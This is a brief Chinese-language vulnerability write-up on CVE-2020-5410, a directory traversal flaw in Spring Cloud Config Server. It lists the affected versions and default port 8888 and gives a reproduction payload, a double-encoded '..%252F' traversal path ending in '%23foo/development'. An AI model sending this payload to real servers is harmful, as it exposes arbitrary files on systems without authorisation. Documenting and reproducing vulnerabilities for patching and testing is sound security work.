Spring 目录遍历 (CVE-2020-5410 )
一、 漏洞描述
Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。
8888端口
二、影响版本
Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本
三、漏洞复现
payload:
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F.. %252Ftmp%23foo/development